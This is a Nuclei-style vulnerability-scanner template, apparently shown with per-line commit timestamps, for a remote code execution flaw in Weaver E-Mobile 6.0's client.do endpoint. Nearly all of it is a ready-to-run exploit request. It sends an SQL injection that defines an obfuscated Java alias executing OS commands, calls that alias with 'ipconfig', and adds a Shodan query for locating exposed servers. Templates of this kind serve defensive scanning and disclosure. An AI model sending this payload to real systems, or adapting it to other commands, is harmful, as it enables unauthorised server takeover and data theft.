2023-09-13 11:22:00 +00:00
id : weaver-e-mobile-rce
2023-08-18 03:22:06 +00:00
info :
2023-09-13 11:22:00 +00:00
name : Weaver E-mobile client.do - Remote Code Execution
2023-08-18 03:22:06 +00:00
author : SleepingBag945
severity : critical
2023-09-13 11:22:00 +00:00
description : |
E-Mobile 6.0 has a command execution vulnerability. It has now been confirmed that this vulnerability can be exploited by an attacker. In some cases, user input may be passed directly to the command execution function of the underlying operating system. An attacker can insert special characters or Command sequence to trick the application into executing it as a valid command, thus gaining command execution permissions from the server.
2023-08-18 03:22:06 +00:00
reference :
- https://mp.weixin.qq.com/s/z-WN2_MTxdk3z4LvchXkXw
2023-09-13 11:22:00 +00:00
- https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E6%B3%9B%E5%BE%AE%20E-Mobile%206.0%20%E5%AD%98%E5%9C%A8%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
metadata :
2023-10-14 11:27:55 +00:00
verified : true
2023-09-13 11:22:00 +00:00
max-request : 1
shodan-query : http.html:"E-Mobile "
2023-10-14 11:27:55 +00:00
tags : e-mobile,rce,weaver,intrusive
2023-08-18 03:22:06 +00:00
http :
- raw :
- |
POST /client.do HTTP/1.1
Host : {{Hostname}}
User-Agent : Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept : */*
Accept-Language : en-US,en;q=0.5
Accept-Encoding : gzip, deflate
Content-Type : multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
------WebKitFormBoundary{{randstr}}
Content-Disposition : form-data; name="method"
getupload
------WebKitFormBoundary{{randstr}}
Content-Disposition : form-data; name="uploadID"
1 ';CREATE ALIAS if not exists MzSNqKsZTagmf AS CONCAT(' void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL MzSNqKsZTagmf('ipconfig');--
------WebKitFormBoundary{{randstr}}--
matchers-condition : and
matchers :
- type : dsl
2023-09-17 16:11:07 +00:00
dsl :
2023-09-13 11:22:00 +00:00
- status_code == 200
- contains(body,'Windows IP Configuration')
2023-09-17 16:11:07 +00:00
condition : and
- type : word
part : header
words :
- "application/json"
- "text/html"
negative : true
2023-10-14 11:27:55 +00:00
condition : and
2023-10-20 11:41:13 +00:00
# digest: 4a0a00473045022017fa697bd8befd71a554f72f9f0ff0870f261c06cf1c8a6d4795cb518e9b04f7022100866a94bc796c9f510db57dad5a9fadc35805f2219659e0b5faa7820d86205334:922c64590222798bb761d5b6d8e72950